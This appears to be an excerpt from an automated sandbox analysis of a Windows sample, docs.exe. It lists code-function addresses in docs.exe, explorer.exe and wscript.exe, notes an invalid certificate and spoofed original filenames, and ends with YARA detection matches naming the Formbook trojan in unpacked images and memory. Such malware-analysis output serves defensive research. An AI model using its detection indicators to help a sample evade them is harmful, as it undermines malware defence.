          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F401005_2_00F40100
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD02C05_2_00FD02C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100A3525_2_0100A352
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF02745_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010103E65_2_010103E6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F05_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFE4F65_2_00FFE4F6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010105915_2_01010591
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF44205_2_00FF4420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010024465_2_01002446
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F505355_2_00F50535
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6C6E05_2_00F6C6E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4C7C05_2_00F4C7C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F507705_2_00F50770
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F747505_2_00F74750
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E8F05_2_00F7E8F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F368B85_2_00F368B8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0101A9A65_2_0101A9A6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F528405_2_00F52840
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5A8405_2_00F5A840
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A05_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F669625_2_00F66962
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100AB405_2_0100AB40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA805_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01006BD75_2_01006BD7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40CF25_2_00F40CF2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0CB55_2_00FF0CB5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50C005_2_00F50C00
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4ADE05_2_00F4ADE0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F68DBF5_2_00F68DBF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FECD1F5_2_00FECD1F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5AD005_2_00F5AD00
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62E905_2_00F62E90
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50E595_2_00F50E59
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5CFE05_2_00F5CFE0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100EE265_2_0100EE26
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F42FC85_2_00F42FC8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCEFA05_2_00FCEFA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100CE935_2_0100CE93
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC4F405_2_00FC4F40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F70F305_2_00F70F30
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF2F305_2_00FF2F30
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F92F285_2_00F92F28
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100EEDB5_2_0100EEDB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFF0CC5_2_00FFF0CC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F570C05_2_00F570C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0101B16B5_2_0101B16B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5B1B05_2_00F5B1B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3F1725_2_00F3F172
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F8516C5_2_00F8516C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100F0E05_2_0100F0E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010070E95_2_010070E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF12ED5_2_00FF12ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100132D5_2_0100132D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6B2C05_2_00F6B2C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F552A05_2_00F552A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F9739A5_2_00F9739A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3D34C5_2_00F3D34C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010075715_2_01007571
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F414605_2_00F41460
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010195C35_2_010195C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100F43F5_2_0100F43F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FED5B05_2_00FED5B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100F7B05_2_0100F7B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F956305_2_00F95630
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010016CC5_2_010016CC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F538E05_2_00F538E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBD8005_2_00FBD800
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F599505_2_00F59950
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6B9505_2_00F6B950
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE59105_2_00FE5910
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFDAC65_2_00FFDAC6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEDAAC5_2_00FEDAAC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F95AA05_2_00F95AA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF1AA35_2_00FF1AA3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FB765_2_0100FB76
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC3A6C5_2_00FC3A6C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F8DBF95_2_00F8DBF9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC5BF05_2_00FC5BF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01007A465_2_01007A46
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FA495_2_0100FA49
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6FB805_2_00F6FB80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01001D5A5_2_01001D5A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01007D735_2_01007D73
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC9C325_2_00FC9C32
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6FDC05_2_00F6FDC0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F53D405_2_00F53D40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FCF25_2_0100FCF2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FF095_2_0100FF09
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F59EB05_2_00F59EB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FFB15_2_0100FFB1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F13FD25_2_00F13FD2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F13FD55_2_00F13FD5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F51F925_2_00F51F92
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE942326_2_0FE94232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE975CD6_2_0FE975CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8EB306_2_0FE8EB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8EB326_2_0FE8EB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8BD026_2_0FE8BD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE919126_2_0FE91912
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8A0826_2_0FE8A082
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE930366_2_0FE93036
          Source: C:\Windows\explorer.exeCode function: 6_2_1047A0366_2_1047A036
          Source: C:\Windows\explorer.exeCode function: 6_2_104710826_2_10471082
          Source: C:\Windows\explorer.exeCode function: 6_2_10472D026_2_10472D02
          Source: C:\Windows\explorer.exeCode function: 6_2_104789126_2_10478912
          Source: C:\Windows\explorer.exeCode function: 6_2_1047E5CD6_2_1047E5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_1047B2326_2_1047B232
          Source: C:\Windows\explorer.exeCode function: 6_2_10475B326_2_10475B32
          Source: C:\Windows\explorer.exeCode function: 6_2_10475B306_2_10475B30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B4E4F68_2_04B4E4F6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B444208_2_04B44420
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B524468_2_04B52446
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B605918_2_04B60591
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA05358_2_04AA0535
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABC6E08_2_04ABC6E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9C7C08_2_04A9C7C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA07708_2_04AA0770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AC47508_2_04AC4750
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B320008_2_04B32000
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B541A28_2_04B541A2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B601AA8_2_04B601AA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B581CC8_2_04B581CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A901008_2_04A90100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3A1188_2_04B3A118
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B281588_2_04B28158
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B202C08_2_04B202C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B402748_2_04B40274
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B603E68_2_04B603E6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAE3F08_2_04AAE3F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5A3528_2_04B5A352
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B40CB58_2_04B40CB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A90CF28_2_04A90CF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA0C008_2_04AA0C00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AB8DBF8_2_04AB8DBF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9ADE08_2_04A9ADE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAAD008_2_04AAAD00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3CD1F8_2_04B3CD1F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5CE938_2_04B5CE93
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AB2E908_2_04AB2E90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5EEDB8_2_04B5EEDB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5EE268_2_04B5EE26
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA0E598_2_04AA0E59
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B1EFA08_2_04B1EFA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AACFE08_2_04AACFE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A92FC88_2_04A92FC8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B42F308_2_04B42F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE2F288_2_04AE2F28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AC0F308_2_04AC0F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B14F408_2_04B14F40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A868B88_2_04A868B8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ACE8F08_2_04ACE8F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA28408_2_04AA2840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAA8408_2_04AAA840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA29A08_2_04AA29A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B6A9A68_2_04B6A9A6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AB69628_2_04AB6962
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9EA808_2_04A9EA80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B56BD78_2_04B56BD7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5AB408_2_04B5AB40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5F43F8_2_04B5F43F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A914608_2_04A91460
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3D5B08_2_04B3D5B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B695C38_2_04B695C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B575718_2_04B57571
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B516CC8_2_04B516CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE56308_2_04AE5630
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5F7B08_2_04B5F7B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5F0E08_2_04B5F0E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B570E98_2_04B570E9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA70C08_2_04AA70C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B4F0CC8_2_04B4F0CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAB1B08_2_04AAB1B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD516C8_2_04AD516C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A8F1728_2_04A8F172
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B6B16B8_2_04B6B16B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA52A08_2_04AA52A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B412ED8_2_04B412ED
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABB2C08_2_04ABB2C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE739A8_2_04AE739A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5132D8_2_04B5132D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A8D34C8_2_04A8D34C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FCF28_2_04B5FCF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B19C328_2_04B19C32
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABFDC08_2_04ABFDC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B57D738_2_04B57D73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA3D408_2_04AA3D40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B51D5A8_2_04B51D5A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA9EB08_2_04AA9EB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FFB18_2_04B5FFB1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA1F928_2_04AA1F92
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A63FD58_2_04A63FD5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A63FD28_2_04A63FD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FF098_2_04B5FF09
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA38E08_2_04AA38E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B0D8008_2_04B0D800
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B359108_2_04B35910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA99508_2_04AA9950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABB9508_2_04ABB950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE5AA08_2_04AE5AA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B41AA38_2_04B41AA3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3DAAC8_2_04B3DAAC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B4DAC68_2_04B4DAC6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B13A6C8_2_04B13A6C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B57A468_2_04B57A46
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FA498_2_04B5FA49
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABFB808_2_04ABFB80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B15BF08_2_04B15BF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ADDBF98_2_04ADDBF9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FB768_2_04B5FB76
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1E7928_2_02A1E792
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A09E608_2_02A09E60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A09E5B8_2_02A09E5B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A02FB08_2_02A02FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A02D878_2_02A02D87
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A02D908_2_02A02D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AA0368_2_049AA036
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AE5CD8_2_049AE5CD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A2D028_2_049A2D02
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A10828_2_049A1082
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A89128_2_049A8912
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AB2328_2_049AB232
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A5B328_2_049A5B32
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A5B308_2_049A5B30
          Source: C:\Users\user\Desktop\docs.exeCode function: String function: 00F97E54 appears 111 times
          Source: C:\Users\user\Desktop\docs.exeCode function: String function: 00FCF290 appears 105 times
          Source: C:\Users\user\Desktop\docs.exeCode function: String function: 00F85130 appears 58 times
          Source: C:\Users\user\Desktop\docs.exeCode function: String function: 00F3B970 appears 280 times
          Source: C:\Users\user\Desktop\docs.exeCode function: String function: 00FBEA12 appears 86 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04B1F290 appears 105 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04AD5130 appears 58 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04B0EA12 appears 86 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A8B970 appears 280 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04AE7E54 appears 111 times
          Source: docs.exeStatic PE information: invalid certificate
          Source: docs.exe, 00000000.00000000.2127478025.0000000000B74000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefdGd.exe, vs docs.exe
          Source: docs.exe, 00000000.00000002.2164405803.0000000007370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs docs.exe
          Source: docs.exe, 00000000.00000002.2157251762.000000000101E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs docs.exe
          Source: docs.exe, 00000000.00000002.2160886912.0000000004A3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs docs.exe
          Source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs docs.exe
          Source: docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs docs.exe
          Source: docs.exe, 00000005.00000002.2213742805.000000000103D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs docs.exe
          Source: docs.exeBinary or memory string: OriginalFilenamefdGd.exe, vs docs.exe
          Source: docs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
